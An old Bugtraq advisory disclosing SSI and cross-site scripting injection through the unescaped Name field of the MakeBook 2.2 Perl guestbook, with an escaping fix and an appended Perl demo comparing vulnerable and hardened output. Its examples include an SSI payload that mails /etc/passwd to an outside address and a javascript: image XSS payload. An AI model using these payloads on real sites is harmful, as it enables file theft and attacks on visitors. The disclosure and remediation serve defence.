8586974 2002-06-12 07:22 +0000  /111 lines/ DownBload <downbload@hotmail.com>
Sent by: joel@lysator.liu.se
Imported: 2002-06-12  16:55  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <22589>
Subject: SSI & CSS execution in MakeBook 2.2
------------------------------------------------------------
From: DownBload <downbload@hotmail.com>
To: bugtraq@securityfocus.com
Message-ID: <20020612072206.29312.qmail@mail.securityfocus.com>



      [ DownBload Security Research Lab Advisory ]
[-------------------------------------------------------------------------]
Advisory name: SSI & CSS execution in MakeBook 2.2
Advisory number: 5
Application: MakeBook 2.2 (CGI script)
Application author: Kristina Pfaff-Harris
Source: http://www.tesol.net/scriptmail.html
Date: 12.6.2002
Impact: remote user can execute shell commands & cross site scripting
Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
Discovered by: DownBload
Mail me @: downbload@hotmail.com




------[ Overview

"...MakeBook v2.2 is a simple program which can be used as a
guestbook, an ongoing writing project where each person adds to an
ongoing story, a comment board, or even a way to let people add
comments to many individual pages.  It allows a user to enter their
name, email address, and some text which will then be added to the
"bookfile".  Originally intended for use in writing a continuing
story or journal, where different students could add to the story as
they went along, it has evolved into a more flexible system which
allows the owner to choose how the "book" entries should appear, and
even what pages they appear on..."



------[ Problem

Our dear Kristina wrote an advanced CGI guestbook, in Perl of course.
It works fine, but the trouble starts when you look for the security
measures in the program. To sign the guestbook you enter your name,
email address and some text. The script does replace 'some' special
characters in $text, but it does not touch the special characters in
$name (or $email) at all, so instead of a name you can enter SSI
(Server Side Includes) or CSS (Cross Site Scripting) code, which goes
into the bookfile verbatim and is served to everyone who views it.

'Buggy' code:

...
$name  = $data{"Name"};
$email = $data{"Email"};
$text  = $data{"Text"};
$text  =~ s/</&lt;/g;
$text  =~ s/>/&gt;/g;
...




------[ Examples

SSI attack
~~~~~~~~~~
Name: <!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->
E-mail: downbload@hotmail.com
Text: I hacked you, my kung-fu is the best... ;)

CSS attack
~~~~~~~~~~
Name: <img src="javascript:alert('HACKED BY DOWNBLOAD');">
E-mail: downbload@hotmail.com
Text: I hacked you, my kung-fu is the best... ;)

I won't give you more examples, use your own imagination :).
BTW: whether the SSI attack works depends on the web server. Some
servers ship with SSI support and some without, and even on Apache the
bookfile has to be served as a server-parsed document (for example an
.shtml file with AddHandler server-parsed, or XBitHack on) in a
directory with Options Includes; with Options IncludesNOEXEC the #exec
directive is refused while #include still works. The CSS example is
browser-dependent in the same way: a javascript: URL in an img src ran
in the browsers of the day, current browsers no longer execute it, but
any other HTML or script the attacker chooses still lands in the page
unchanged.




------[ Solution

The fix is to escape HTML metacharacters in every user-supplied field,
not just $text, before the entry is written to the bookfile. Turning <
into &lt; is what stops both attacks: an SSI directive that no longer
starts with a literal "<!--#" is never parsed by mod_include, and an
<img> tag that reads "&lt;img" is plain text to the browser. For now,
you can use this:

...
$name  = $data{"Name"};
$name  =~ s/</&lt;/g;
$name  =~ s/>/&gt;/g;

$email = $data{"Email"};
$email =~ s/</&lt;/g;
$email =~ s/>/&gt;/g;

$text = $data{"Text"};
$text =~ s/</&lt;/g;
$text =~ s/>/&gt;/g;
...

Two caveats a complete fix should cover: escape & as &amp; before
touching < and >, so the entities produced by the other substitutions
are not escaped a second time and a literal & in a name still renders
correctly; and if any field is ever placed inside an attribute (a
mailto: href built from $email, say), also escape " as &quot;, or the
value can break out of the attribute.
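The unescaped $name from the Problem section and the per-field escaping from the Solution, put together in one runnable script. This is an added example, not MakeBook's code and not from the advisory's author: the bookfile line format (a <p> with the name in bold) is assumed, the two submissions are constructed from the payloads in the Examples section, and escape_html, vulnerable_entry, safe_entry and entry_has_raw_tag are names chosen here.

```perl
#!/usr/bin/perl
# Added example, not MakeBook's own code: the advisory's two payloads are
# run through (a) the escaping MakeBook 2.2 applies to $text only and
# (b) one escape routine applied to every field. The bookfile line
# format used here is an assumption; MakeBook's real template is not
# shown in the advisory.
use strict;
use warnings;

# Escape HTML metacharacters. '&' must be replaced first, otherwise the
# entities produced by the later substitutions would be escaped again.
sub escape_html {
    my ($s) = @_;
    $s =~ s/&/&amp;/g;
    $s =~ s/</&lt;/g;
    $s =~ s/>/&gt;/g;
    $s =~ s/"/&quot;/g;
    $s =~ s/'/&#39;/g;
    return $s;
}

# Constructed submissions carrying the payloads from the Examples section.
my @submissions = (
    { Name  => '<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->',
      Email => 'downbload@hotmail.com',
      Text  => 'I hacked you, my kung-fu is the best... ;)' },
    { Name  => q{<img src="javascript:alert('HACKED BY DOWNBLOAD');">},
      Email => 'downbload@hotmail.com',
      Text  => 'I hacked you, my kung-fu is the best... ;)' },
);

# (a) MakeBook 2.2 as described: only $text is escaped, $name and $email
#     go into the bookfile verbatim.
sub vulnerable_entry {
    my ($d) = @_;
    my $name  = $d->{Name};
    my $email = $d->{Email};
    my $text  = $d->{Text};
    $text =~ s/</&lt;/g;
    $text =~ s/>/&gt;/g;
    return "<p><b>$name</b> ($email)<br>$text</p>\n";
}

# (b) Hardened: every user-supplied field is escaped before it is written.
sub safe_entry {
    my ($d) = @_;
    my $name  = escape_html($d->{Name});
    my $email = escape_html($d->{Email});
    my $text  = escape_html($d->{Text});
    return "<p><b>$name</b> ($email)<br>$text</p>\n";
}

# Check: does any user-supplied field still contribute a raw '<' to the
# entry? The template's own <p>, <b> and <br> tags are stripped first.
sub entry_has_raw_tag {
    my ($entry) = @_;
    (my $rest = $entry) =~ s{</?(?:p|b)>|<br>}{}g;
    return $rest =~ /</ ? 1 : 0;
}

for my $d (@submissions) {
    my $bad  = vulnerable_entry($d);
    my $good = safe_entry($d);
    print "vulnerable: $bad";     # SSI directive / <img> tag survive intact
    print "hardened:   $good";    # only entities remain
    print "raw tag left in vulnerable entry: ", entry_has_raw_tag($bad),  "\n";
    print "raw tag left in hardened entry:   ", entry_has_raw_tag($good), "\n\n";
}
```

Run it with perl and compare the two lines printed per submission: the vulnerable entry still carries the literal <!--#exec and <img, the hardened one carries only entities, and entry_has_raw_tag reports 1 for the former and 0 for the latter. escape_html also handles & (first, so later entities are not re-escaped) and both quote characters, which the advisory's three-line fix leaves alone.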




------[ Greetz

Greetz goes to #hr.hackers <irc.carnet.hr>.
Special greetz goes to Kristina Pfaff-Harris (ladies first), BoyScout, 
h4z4rd, fi, Fr1c, harlequin and www.active-security.org.